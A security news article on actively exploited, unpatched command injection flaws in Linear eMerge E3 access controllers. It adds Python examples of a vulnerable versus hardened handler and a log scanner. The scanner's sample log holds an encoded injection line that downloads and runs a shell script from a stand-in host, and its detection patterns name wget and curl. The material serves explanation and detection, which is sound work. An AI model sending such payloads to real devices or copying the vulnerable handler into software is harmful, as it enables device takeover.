Vulnerabilities in Linear eMerge E3 building access control systems are being exploited by hackers, who conscript the compromised devices into DDoS attacks. The vulnerabilities were discovered in May 2019, but they have still not been patched.
Linear eMerge E3
eMerge is an access controller: it decides which doors to rooms or buildings a given person may open, and at which times. These systems are deployed in commercial and industrial buildings to secure facilities and give employees controlled access. Employees open doors using access codes or smart cards.
The affected eMerge E3 versions are 1.00-06 and below. Researchers from Applied Risk, a cyber security firm specializing in industrial security services, identified 10 vulnerabilities in the eMerge E3 system and disclosed their details back in May 2019. To date, however, the vendor, Nortek Security & Control (NSC), has not provided patches for any of them.
Because these systems are managed through a web interface, attackers who find one reachable from the internet can attack it directly from a browser or script. Hackers have already compromised over 2,300 eMerge E3 systems.
Exploitation of eMerge E3 Vulnerabilities
According to a report published by SonicWall last week, hackers are scanning the internet for eMerge systems to exploit. They are using a command injection flaw in the building access control system to gain access to companies' application data and networks.
This flaw is one of the two vulnerabilities that received a high severity score: it can be exploited remotely, without authentication, and requires little technical skill. The SonicWall report states that the attacks are targeting some 100 countries, with most of them occurring in the US.
According to SonicWall, "this issue is triggered due to insufficient sanitizing of user-supplied inputs to a PHP function allowing arbitrary command execution with root privileges. A remote unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application, via a crafted HTTP request."
eMerge E3 Dependent DDoS Attacks
Hackers are using the command injection flaw to take over eMerge E3 devices. Once in control, they download and install malware on the compromised devices, which are then used to launch DDoS attacks against other targets.
A command injection flaw is a web security vulnerability that lets an attacker execute operating system commands on the server running the application, with whatever privileges the application process has. Since the eMerge E3 web application runs as root, a successful injection compromises not just the application and its data but the entire device.
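The following is an added illustration of the bug class described in SonicWall's quote and the paragraph above; it is not the eMerge E3 code, and it is written in Python rather than the device's PHP. The handler, the "reader_id" parameter and the harmless echo command it runs are hypothetical stand-ins chosen so the example can run safely. It assumes a POSIX /bin/sh, as found on Linux-based embedded devices. It shows a value from an HTTP parameter being concatenated into a shell command line (the "insufficient sanitizing" case), the same request rejected by an allowlist, and why passing the value as a separate argument with no shell makes the metacharacters inert even when validation is missing.

```python
import re
import subprocess

# Hypothetical stand-in for a device-side handler; the real eMerge E3 code is
# not reproduced here. Assumes a POSIX /bin/sh for the shell=True call.


def query_reader_vulnerable(reader_id):
    """Insufficiently sanitized input concatenated into a shell command line.
    Whatever the HTTP parameter contains is handed to /bin/sh, so ';', '|',
    backticks and $(...) in it become additional commands. On a device whose
    web application runs as root, those commands run as root."""
    cmd = "echo reader=" + reader_id            # attacker-controlled text
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist: a reader identifier is expected to be 1-4 digits (hypothetical).
READER_ID_RE = re.compile(r"[0-9]{1,4}")


def query_reader_hardened(reader_id):
    """Two independent defences: reject anything that is not the expected
    shape, and pass the value as an argv element so no shell ever parses it."""
    if not READER_ID_RE.fullmatch(reader_id):
        raise ValueError("invalid reader id: %r" % reader_id)
    out = subprocess.run(["echo", "reader=" + reader_id],
                         capture_output=True, text=True)
    return out.stdout


def query_reader_no_shell_only(reader_id):
    """The second defence on its own (no allowlist), to show what it buys:
    the argv form hands the whole string to echo as one argument, so the
    metacharacters are printed back rather than executed."""
    out = subprocess.run(["echo", "reader=" + reader_id],
                         capture_output=True, text=True)
    return out.stdout


def is_rejected(reader_id):
    """True if the hardened handler refuses the value."""
    try:
        query_reader_hardened(reader_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload of the kind a crafted HTTP parameter might carry.
    payload = "1; echo INJECTED_COMMAND_RAN"
    print("vulnerable :", repr(query_reader_vulnerable(payload)))
    print("no-shell   :", repr(query_reader_no_shell_only(payload)))
    print("hardened   :", "rejected" if is_rejected(payload) else "accepted")
```

The vulnerable handler prints "reader=1" and then runs the injected second command; swap the echo for wget or curl and you have the malware-download step described in the next section. The allowlist is the primary fix, and avoiding the shell entirely is the safety net for the case where a new parameter is added without one.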
Safeguarding Against eMerge E3 Dependent DDoS Attacks
Attacks exploiting the command injection flaw on eMerge E3 devices were first observed on 9 January 2020 and have continued in a constant stream since. System administrators responsible for networks with eMerge E3 devices are advised to take these systems off the internet entirely. Where that is not possible, restrict access to the device's web interface to trusted addresses with a firewall, or expose it only over a VPN, until a vendor patch becomes available.
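Alongside restricting access, an administrator will want to know whether a device has already been probed. The following is an added example, not from the original article or from SonicWall, that scans web server access log lines for the pattern these attacks leave: a request parameter whose decoded value contains shell metacharacters or a download tool name. The log lines are constructed for the example, the /device/readers.php path and reader parameter are hypothetical (not the real eMerge E3 endpoints), and all addresses are from the RFC 5737 documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Combined Log Format). Paths, parameter
# names and addresses are hypothetical; none of this came from a real device.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jan/2020:10:14:22 +0000] "GET /device/readers.php?reader=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [09/Jan/2020:10:15:03 +0000] "GET /device/readers.php?reader=1%3Bwget%20http%3A%2F%2F198.51.100.99%2Fbot.sh%20-O%20%2Ftmp%2Fb%3Bsh%20%2Ftmp%2Fb HTTP/1.1" 200 512 "-" "python-requests/2.22.0"
192.0.2.50 - - [09/Jan/2020:10:16:40 +0000] "POST /device/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [09/Jan/2020:10:17:11 +0000] "GET /device/readers.php?reader=%60id%60 HTTP/1.1" 200 512 "-" "curl/7.64.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Characters and sequences a POSIX shell treats specially. Any of them in a
# parameter that should hold a plain identifier is a strong signal.
SHELL_META_RE = re.compile(r'[;|`&\n]|\$\(')
# Tools an injected command typically uses to fetch a second stage, matching
# the malware-download step described in the article.
FETCH_TOOL_RE = re.compile(r'\b(wget|curl|tftp|ftpget)\b')


def parse_line(line):
    """Split one Combined Log Format line into fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_params(target):
    """Percent-decode the query string and return (param, value, reasons)
    for every value that looks like an injection attempt."""
    findings = []
    qs = urlsplit(target).query
    for name, values in parse_qs(qs, keep_blank_values=True).items():
        for value in values:
            reasons = []
            if SHELL_META_RE.search(value):
                reasons.append("shell-metacharacter")
            if FETCH_TOOL_RE.search(value):
                reasons.append("download-tool")
            if reasons:
                findings.append((name, value, reasons))
    return findings


def scan_access_log(lines):
    """Return one dict per suspicious request: source, timestamp, path,
    the decoded parameter value and why it was flagged."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        for name, value, reasons in inspect_params(entry["target"]):
            hits.append({
                "ip": entry["ip"], "ts": entry["ts"],
                "path": urlsplit(entry["target"]).path,
                "param": name, "value": value,
                "reasons": reasons, "ua": entry["ua"],
            })
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG.splitlines()):
        print(h["ts"], h["ip"], h["path"], "%s=%r" % (h["param"], h["value"]),
              ",".join(h["reasons"]))
```

Decoding before matching matters: the second line carries its ';' as %3B and would slip past a check on the raw request. A hit from an unexpected source, especially one with a scripting user agent, is a reason to treat the device as compromised rather than merely probed, since the vulnerability needs no authentication to succeed.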